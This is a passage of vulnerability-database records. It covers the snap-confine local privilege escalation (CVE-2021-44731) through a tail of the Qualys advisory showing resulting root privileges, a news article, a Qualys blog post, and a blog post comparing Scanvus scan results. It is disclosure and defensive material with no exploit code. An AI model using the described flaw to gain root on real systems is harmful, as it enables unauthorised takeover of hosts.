id\nuid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)\n ^^^^^^^^^^^^\n------------------------------------------------------------------------\n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe thank the Ubuntu security team (Alex Murray and Seth Arnold in\nparticular) and the snapd team for their hard work on this snap-confine\nvulnerability. We also thank the members of linux-distros@openwall.\n", "sourceHref": "https://0day.today/exploit/38096", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:32", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEg_O3UT9-eSaotLlYT_E-3sdZdAVxUIvQwoDWA-rjw9JOsCuFa8Al99uMIrj6SGHkbmvGqai3kGQoZAxJXSk3tlzOTqQyVvsGHNttK33F-3i-cMxvSVnw6qfNs9f4CID1nVlfFDvZTLW2TQXVSv7jIs7fAsoQr99Rl2SdjQQ1F7e117koOh4D7EbC86>)\n\nMultiple security vulnerabilities have been disclosed in Canonical's [Snap](<https://en.wikipedia.org/wiki/Snap_\\(package_manager\\)>) software packaging and deployment system, the most critical of which can be exploited to escalate privilege to gain root privileges.\n\nSnaps are self-contained application packages that are designed to work on operating systems that use the Linux kernel and can be installed using a tool called snapd.\n\nTracked as **CVE-2021-44731**, the issue concerns a privilege escalation flaw in the [snap-confine](<https://manpages.ubuntu.com/manpages/bionic/man1/snap-confine.1.html>) function, a program used internally by snapd to construct the execution environment for snap applications. The shortcoming is rated 7.8 on the CVSS scoring system.\n\n\"Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host,\" Bharat Jogi, director of vulnerability and threat research at Qualys, [said](<https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731>), adding the weakness could be abused to \"obtain full root privileges on default installations of Ubuntu.\"\n\nRed Hat, in an independent advisory, described the issue as a \"race condition\" in the snap-confine component.\n\n\"A race condition in snap-confine exists when preparing a private mount namespace for a snap,\" the company [noted](<https://ubuntu.com/security/CVE-2021-44731>). \"This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence privilege escalation.\"\n\nAdditionally discovered by the cybersecurity firm are six other flaws \u2013\n\n * **CVE-2021-3995** \u2013 Unauthorized unmount in util-linux's libmount\n * **CVE-2021-3996** \u2013 Unauthorized unmount in util-linux's libmount\n * **CVE-2021-3997** \u2013 Uncontrolled recursion in systemd's systemd-tmpfiles\n * **CVE-2021-3998** \u2013 Unexpected return value from glibc's realpath()\n * **CVE-2021-3999** \u2013 Off-by-one buffer overflow/underflow in glibc's getcwd()\n * **CVE-2021-44730** \u2013 Hardlink attack in snap-confine's sc_open_snapd_tool()\n\nThe vulnerability was reported to the Ubuntu security team on October 27, 2021, following which patches were released on February 17 as part of a coordinated disclosure process.\n\nQualys also pointed out that while the flaw isn't remotely exploitable, an attacker that has logged in as an unprivileged user can \"quickly\" exploit the bug to gain root permissions, necessitating that the patches are applied as soon as possible to mitigate potential threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T08:37:00", "type": "thn", "title": "New Linux Privilege Escalation Flaw Uncovered in Snap Package Manager", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-3997", "CVE-2021-3998", "CVE-2021-3999", "CVE-2021-44730", "CVE-2021-44731"], "modified": "2022-02-18T08:37:46", "id": "THN:85C69AD4617097A82E6BB57E4EBB6186", "href": "https://thehackernews.com/2022/02/new-linux-privilege-escalation-flaw.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-28T21:32:51", "description": "\n\nThe Qualys Research Team has discovered multiple vulnerabilities in the snap-confine function on Linux operating systems, the most important of which can be exploited to escalate privilege to gain root privileges. Qualys recommends security teams apply patches for these vulnerabilities as soon as possible.\n\n### About snap-confine\n\nSnap is a software packaging and deployment system developed by Canonical for operating systems that use the Linux kernel. The packages, called snaps, and the tool for using them, snapd, work across a range of Linux distributions and allow upstream software developers to distribute their applications directly to users. Snaps are self-contained applications running in a sandbox with mediated access to the host system. Snap-confine is a program used internally by snapd to construct the execution environment for snap applications.\n\n### Potential Impact of Oh Snap! More Lemmings Vulnerability\n\nSuccessful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host. Qualys security researchers have been able to independently verify the vulnerability, develop an exploit, and obtain full root privileges on default installations of Ubuntu.\n\nAs soon as the Qualys Research Team confirmed the vulnerability, we engaged in responsible vulnerability disclosure and coordinated with both vendor and open-source distributions in announcing this newly discovered vulnerability.\n\n# Vulnerability Disclosure Timeline\n\n * 2021-10-27: We sent our advisory and proofs-of-concepts to [security@ubuntu](<mailto://security@ubuntu>).\n * 2021-11-10: We sent our advisory and proofs-of-concepts (without the snap-confine vulnerabilities) to [secalert@redhat](<mailto://secalert@redhat>).\n * 2021-12-29: We sent a write-up and the patch for the systemd vulnerability to [linux-distros@openwall](<mailto://linux-distros@openwall>).\n * 2022-01-10: We published our write-up on the systemd vulnerability (<https://www.openwall.com/lists/oss-security/2022/01/10/2>).\n * 2022-01-12: Red Hat filed the glibc vulnerabilities upstream (<https://sourceware.org/bugzilla/show_bug.cgi?id=28769> and <https://sourceware.org/bugzilla/show_bug.cgi?id=28770>).\n * 2022-01-20: We sent a write-up and the patches for the util-linux vulnerabilities to [linux-distros@openwall](<mailto://linux-distros@openwall>).\n * 2022-01-24: We published our write-up on the util-linux vulnerabilities (<https://www.openwall.com/lists/oss-security/2022/01/24/2>).\n * 2022-01-24: We published our write-up on the glibc vulnerabilities (<https://www.openwall.com/lists/oss-security/2022/01/24/4>).\n * 2022-02-03: We sent our advisory and Ubuntu sent their patches for the snap-confine vulnerabilities to [linux-distros@openwall](<mailto://linux-distros@openwall>).\n * 2022-02-17: Coordinated Release Date (5:00 PM UTC) for the snap-confine\n * vulnerabilities.\n\n### Proof of Concept Video of Oh Snap! More Lemmings Exploit\n\n### Vulnerability Summary\n\nCVE| Description \n---|--- \nCVE-2021-44731| Race condition in snap-confine&#x27;s setup_private_mount() \nCVE-2021-44730| Hardlink attack in snap-confine&#x27;s sc_open_snapd_tool() \nCVE-2021-3996| Unauthorized unmount in util-linux&#x27;s libmount \nCVE-2021-3995| Unauthorized unmount in util-linux&#x27;s libmount \nCVE-2021-3998| Unexpected return value from glibc&#x27;s realpath() \nCVE-2021-3999| Off-by-one buffer overflow/underflow in glibc&#x27;s getcwd() \nCVE-2021-3997| Uncontrolled recursion in systemd&#x27;s systemd-tmpfiles \n \n### Technical Details of Oh Snap! More Lemmings Vulnerability\n\nThe technical details of Oh Snap! More Lemmings vulnerabilities can be found at[ <https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt>](<https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt>).\n\n### Solution: How to Patch the Oh Snap! More Lemmings Vulnerability\n\nCurrent Qualys customers can search the vulnerability knowledgebase for CVE-2021-44731 to identify all the QIDs and assets vulnerable for this vulnerability.\n\nOther interested parties can start a free Qualys VMDR trial to get full access to the QIDs (detections) for CVE-2021- 44731, where all vulnerable assets can be identified.\n\n#### Qualys QID Coverage\n\nQualys is releasing the QIDs in the table below as they become available, starting with vulnsigs version VULNSIGS-2.5.407-2 and in Linux Cloud Agent manifest version lx_manifest-2.5.407.2-1\n\n**QID**| **Title**| **VulnSigs Version** \n---|---|--- \n376419| Snap-Confine Local Privilege Escalation Vulnerability (Oh Snap! More Lemmings)| VULNSIGS-2.5.407-2 / LX_MANIFEST- VULNSIGS-2.5.407.2-1 \n \n### Discover Vulnerable Linux Servers Using Qualys VMDR\n\nThe following instructs current Qualys customers on how to detect Oh Snap! More Lemmings in their environment.\n\n#### Identify Assets Running Ubuntu Operating System\n\nThe first step in managing this critical vulnerability and reducing risk is identification of all assets running Ubuntu OS. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify such assets.\n\n_operatingSystem.name:&quot;Ubuntu&quot;_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019; let\u2019s say: \u201cUbuntu Systems\u201d. This helps by automatically grouping existing hosts with the above vulnerabilities as well as any new assets that spin up in your environment. Tagging makes these grouped assets available for querying, reporting, and management throughout [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n### Prioritize Based on RTIs\n\nUsing Qualys VMDR, the Oh Snap! More Lemmings vulnerability can be prioritized using the following real-time threat indicators (RTIs):\n\nPredicted_High_Risk \nPrivilege_Escalation \nEasy_Exploit \nHigh_Lateral_Movement\n\n\n\n### Patch With Qualys VMDR\n\nWe expect vendors to release patches for this vulnerability in the short term. Qualys Patch Management can be used to deploy those patches to vulnerable assets, when available.\n\nUsing the same prioritization based on RTI method as described above, customers can use the \u201cpatch now\u201d button found to the right of the vulnerability to add Oh Snap! More Lemmings to a patch job. Once patches are released, Qualys will find the relevant patches for this vulnerability and automatically add those patches to a patch job. This will allow customers to deploy those patches to vulnerable devices, all from Qualys Cloud Platform. \n\n### Detect Impacted Assets with Threat Protection\n\nQualys VMDR also enables you to automatically map assets vulnerable to Oh Snap! More Lemmings vulnerabilities using Threat Protect.\n\n\n\n### Track Vulnerability with VMDR Dashboard\n\nWith VMDR Unified Dashboard, you can track this vulnerability, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerability trends in your environment using the \u201cOh Snap! More Lemmings\u201d Dashboard.\n\n[View and download the &quot;Oh Snap! More Lemmings\u201d dashboard](<https://blog.qualys.com/wp-content/uploads/2022/02/oh-snap-more-lemmings-dashboard.zip>)[Download](<https://blog.qualys.com/wp-content/uploads/2022/02/oh-snap-more-lemmings-dashboard.zip>)\n\n\n\n### Vendor References\n\n<https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt>\n\n### Frequently Asked Questions (FAQs)\n\n#### Will the Qualys Research Team publish exploit code for this vulnerability?\n\nNo. Not at this time.\n\n#### Are there any mitigations for this vulnerability?\n\nNo.\n\n#### Is this vulnerability remotely exploitable?\n\nNo. But if an attacker can log in as any unprivileged user, the vulnerability can be quickly exploited to gain root privileges.\n\n#### Why is the vulnerability named \u201cOh Snap! More Lemmings Kit\u201d?\n\nThis is a pun intended on the name of the vulnerable application snap-confine.", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T19:15:55", "type": "qualysblog", "title": "Oh Snap! More Lemmings: Local Privilege Escalation Vulnerability Discovered in snap-confine (CVE-2021-44731)", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-3997", "CVE-2021-3998", "CVE-2021-3999", "CVE-2021-44730", "CVE-2021-44731"], "modified": "2022-02-17T19:15:55", "id": "QUALYSBLOG:9F041FBF31AA14C1B0593ECDE945330B", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2023-08-30T12:44:33", "description": "Hello everyone! Great news for my open source [Scanvus](<https://github.com/leonov-av/scanvus>) project! You can now perform vulnerability checks on Linux hosts and docker images not only using the [Vulners.com API](<https://vulners.com/docs/API_wrapper/linux_audit/>), but also with the [Vulns.io VM API](<https://vulns.io/>). It&#x27;s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. I just had to do the final test. Many thanks to them for this!\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239113>\n\n## How can the support of these two APIs in Scanvus be useful?\n\n 1. Now there is no binding to one vendor. Choose which service and price you prefer.\n 2. The set of supported operating systems varies between Vulners.com and Vulns.io. If a particular Linux distribution is not supported by one vendor, it may be supported by another vendor.\n 3. Vulners and Vulns.io implemented vulnerability checks independently of each other. If the results differ when scanning the same host/image, then implementation errors will be clearly visible.\n 4. Scanvus is released under the MIT license, so you can use it as an example of working with the Vulners.com and Vulns.io APIs and use this code in your projects.\n\n## How to use it?\n\nBasically, everything works exactly the same. You only need to specify the API you want to use in the -audit-service parameter. This can be &quot;vulners&quot; (default) or &quot;vulnsio&quot;.\n\n### Localhost\n\nTo begin, I scanned my localhost. This is a completely updated Ubuntu host. Vulners and Vulns.io did not detect security bulletin vulnerabilities there. And this is correct.\n\nVulners did not detect any vulnerabilities at all.\n \n \n $ python3.8 scanvus.py --audit-service vulners --assessment-type localhost\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: localhost\n host: localhost\n Getting OS inventory data...\n os_name: ubuntu\n os_version: 20.04\n package_list_len: 2899\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for localhost (localhost, ubuntu 20.04, linux kernel 5.4.0-135-generic, 2899 packages)\n 0 vulnerabilities were found\n \n\nAnd Vulns.io detected some vulnerabilities.\n \n \n $ python3.8 scanvus.py --audit-service vulnsio --assessment-type localhost\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: localhost\n host: localhost\n Getting OS inventory data...\n os_name: ubuntu\n os_version: 20.04\n package_list_len: 2899\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for localhost (localhost, ubuntu 20.04, linux kernel 5.4.0-135-generic, 2899 packages)\n 3 vulnerabilities with levels ['Medium', 'Critical', 'High'] were found\n +---+----------+-------------+------------------+-------------------------------------------------------------------------------+\n | N | Level | Bulletin | CVE | Proof |\n +---+----------+-------------+------------------+-------------------------------------------------------------------------------+\n | 1 | Critical | no advisory | CVE-2021-21783 | apparmor-2.13.3-7ubuntu5.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2207 | libapparmor1-2.13.3-7ubuntu5.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-12390 | libapparmor1-2.13.3-7ubuntu5.1.i386 >= 0:0.0.0 |\n | | | | CVE-2021-3773 | chromium-codecs-ffmpeg-extra-1:85.0.4183.83-0ubuntu0.20.04.2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-25236 | gstreamer1.0-libav-1.16.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-24791 | libqt5webengine-data-5.12.8+dfsg-0ubuntu1.1.all >= 0:0.0.0 |\n | | | | CVE-2019-15232 | libqt5webengine5-5.12.8+dfsg-0ubuntu1.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-26972 | libqt5webenginecore5-5.12.8+dfsg-0ubuntu1.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-12389 | libqt5webenginewidgets5-5.12.8+dfsg-0ubuntu1.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2042 | firefox-108.0+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-13576 | firefox-locale-en-108.0+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-23852 | firefox-locale-ru-108.0+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1253 | thunderbird-1:102.4.2+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-29462 | thunderbird-gnome-support-1:102.4.2+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-30475 | thunderbird-locale-en-1:102.4.2+build2-0ubuntu0.20.04.1.amd64 >= 0:0.0.0 |\n ...\n \n\nWhy? Because Vulners and Vulns.io work differently. Vulners only detects vulnerabilities mentioned in bulletins, while Vulns.io also shows vulnerabilities for which there are no bulletins and patches that fix the vulnerability. Such vulnerabilities are grouped by severity with &quot;no advisory&quot; instead of a bulletin identifier. Whether you want to see vulnerabilities that you can&#x27;t fix yet is up to you.\n\n### Linux host\n\nNext, I scanned a test upatched Debian 11 host.\n \n \n $ ssh-copy-id -i ~/.ssh/id_rsa.pub vmuser@192.168.56.105\n $ ssh -i ~/.ssh/id_rsa.pub vmuser@192.168.56.105\n\nIn this case, vulnerabilities related to security bulletins were detected. And there are not many of them, so the reports can be easily analyzed manually.\n \n \n $ python3.8 scanvus.py --audit-service \"vulners\" --assessment-type \"remote_ssh\" --host \"192.168.56.105\" --user-name \"vmuser\" --key-path \"/home/alexander/.ssh/id_rsa.pub\"\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: remote_ssh\n host: 192.168.56.105\n user_name: vmuser\n key_path: /home/alexander/.ssh/id_rsa.pub\n Getting OS inventory data...\n os_name: debian\n os_version: 11\n package_list_len: 364\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for 192.168.56.105 (remote_ssh, debian 11, linux kernel 5.10.0-17-amd64, 364 packages)\n 3 vulnerabilities with levels ['High', 'Medium'] were found\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n | N | Level | Bulletin | CVE | Proof |\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n | 1 | High | DEBIAN:DLA-3152-1:9B676 | CVE-2016-10228 | libc-bin 2.31-13+deb11u3 amd64 < 2.31-13+deb11u4 |\n | | | | CVE-2019-19126 | libc6 2.31-13+deb11u3 amd64 < 2.31-13+deb11u4 |\n | | | | CVE-2019-25013 | locales 2.31-13+deb11u3 all < 2.31-13+deb11u4 |\n | | | | CVE-2020-10029 | libc-l10n 2.31-13+deb11u3 all < 2.31-13+deb11u4 |\n | | | | CVE-2020-1752 | |\n | | | | CVE-2020-27618 | |\n | | | | CVE-2020-6096 | |\n | | | | CVE-2021-27645 | |\n | | | | CVE-2021-3326 | |\n | | | | CVE-2021-33574 | |\n | | | | CVE-2021-35942 | |\n | | | | CVE-2021-3999 | |\n | | | | CVE-2022-23218 | |\n | | | | CVE-2022-23219 | |\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n | 2 | Medium | DEBIAN:DLA-3206-1:5481E | CVE-2019-14870 | krb5-locales 1.18.3-6+deb11u1 all < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-3671 | libkrb5-3 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-44758 | libk5crypto3 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-3437 | libkrb5support0 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-41916 | libgssapi-krb5-2 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-42898 | |\n | | | | CVE-2022-44640 | |\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n | 3 | Medium | DEBIAN:DSA-5287-1:12BD4 | CVE-2021-3671 | krb5-locales 1.18.3-6+deb11u1 all < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-44758 | libkrb5-3 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-3437 | libk5crypto3 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-41916 | libkrb5support0 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-42898 | libgssapi-krb5-2 1.18.3-6+deb11u1 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-44640 | |\n +---+--------+-------------------------+----------------+------------------------------------------------------------+\n \n \n \n $ python3.8 scanvus.py --audit-service \"vulnsio\" --assessment-type \"remote_ssh\" --host \"192.168.56.105\" --user-name \"vmuser\" --key-path \"/home/alexander/.ssh/id_rsa.pub\"\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: remote_ssh\n host: 192.168.56.105\n user_name: vmuser\n key_path: /home/alexander/.ssh/id_rsa.pub\n Getting OS inventory data...\n os_name: debian\n os_version: 11\n package_list_len: 364\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for 192.168.56.105 (remote_ssh, debian 11, linux kernel 5.10.0-17-amd64, 364 packages)\n 7 vulnerabilities with levels ['Medium', 'Critical', 'High'] were found\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | N | Level | Bulletin | CVE | Proof |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 1 | Critical | DSA-5236-1 | CVE-2022-40674 | libexpat1-2.2.10-2+deb11u3.amd64 < 0:2.2.10-2+deb11u4 |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 2 | Critical | no advisory | CVE-2022-23303 | apparmor-2.13.6-10.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45952 | libapparmor1-2.13.6-10.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-3491 | bluetooth-5.55-3.1.all >= 0:0.0.0 |\n | | | | CVE-2020-27619 | bluez-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-43400 | libbluetooth3-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-29921 | busybox-1:1.30.1-6+b3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-37454 | dnsmasq-base-2.85-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-1010022 | libc-bin-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2005-2541 | libc-l10n-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2021-45957 | libc6-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-46908 | locales-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2021-42377 | libdb5.3-5.3.28+dfsg1-0.8.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-46848 | libpcre2-8-0-10.36-2.amd64 < 0:10.36-2+deb11u1 |\n | | | | CVE-2022-23304 | libpython3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-8457 | libpython3.9-stdlib-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2210 | python3.9-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2042 | python3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1586 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45954 | libtasn1-6-4.16.0-2.amd64 < 0:4.16.0-2+deb11u1 |\n | | | | CVE-2022-1587 | tar-1.34+dfsg-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45953 | vim-common-2:8.2.2434-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2016-1585 | vim-tiny-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45955 | xxd-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45956 | wpasupplicant-2:2.9.0-21.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45951 | |\n | | | | CVE-2015-20107 | |\n | | | | CVE-2022-2207 | |\n | | | | CVE-2022-0318 | |\n | | | | CVE-2022-1927 | |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 3 | High | DSA-5207-1 | CVE-2022-26373 | linux-image-5.10.0-16-amd64-5.10.127-2.amd64 < 0:5.10.136-1 |\n | | | | CVE-2022-2585 | |\n | | | | CVE-2022-23816 | |\n | | | | CVE-2022-2588 | |\n | | | | CVE-2022-29901 | |\n | | | | CVE-2022-36946 | |\n | | | | CVE-2022-2586 | |\n | | | | CVE-2022-29900 | |\n | | | | CVE-2022-36879 | |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 4 | High | DSA-5235-1 | CVE-2022-3080 | bind9-dnsutils-1:9.16.27-1~deb11u1.amd64 < 1:9.16.33-1~deb11u1 |\n | | | | CVE-2022-38177 | bind9-host-1:9.16.27-1~deb11u1.amd64 < 1:9.16.33-1~deb11u1 |\n | | | | CVE-2022-2795 | bind9-libs-1:9.16.27-1~deb11u1.amd64 < 1:9.16.33-1~deb11u1 |\n | | | | CVE-2022-38178 | |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 5 | High | no advisory | CVE-2022-1616 | bash-completion-1:2.11-2.all >= 0:0.0.0 |\n | | | | CVE-2022-31782 | bluetooth-5.55-3.1.all >= 0:0.0.0 |\n | | | | CVE-2022-0361 | bluez-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-15778 | libbluetooth3-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-3534 | busybox-1:1.30.1-6+b3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-28831 | cpio-2.13+dfsg-4.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-43680 | dnsmasq-base-2.85-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-43551 | e2fsprogs-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0629 | libcom-err2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2284 | libext2fs2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4173 | libss2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0729 | logsave-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3999 | 